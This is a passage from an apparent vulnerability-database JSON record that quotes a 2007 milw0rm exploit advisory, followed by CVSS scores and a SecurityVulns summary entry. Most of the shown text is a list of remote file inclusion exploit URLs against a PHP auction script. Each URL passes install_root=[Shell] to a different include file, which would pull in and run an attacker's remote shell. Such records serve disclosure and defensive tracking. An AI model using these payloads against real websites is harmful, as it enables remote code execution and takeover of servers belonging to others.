itE.com/include/display/user.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/buynow.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/install_complete.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/fees_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_feedback.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/admin_balance.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/activate.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/member.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/add_bid.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/items_filter.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/my_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/register.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/leave_feedback.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_auctions.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/design/form.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/processor.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/interfaces.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/left_menu.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/login.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/categories.inc.php?install_root=[Shell]\n********************************************************************************\n\n# milw0rm.com [2007-03-29]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3607/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-02T00:00:00", "published": "2007-04-02T00:00:00", "id": "SECURITYVULNS:VULN:7521", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7521", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}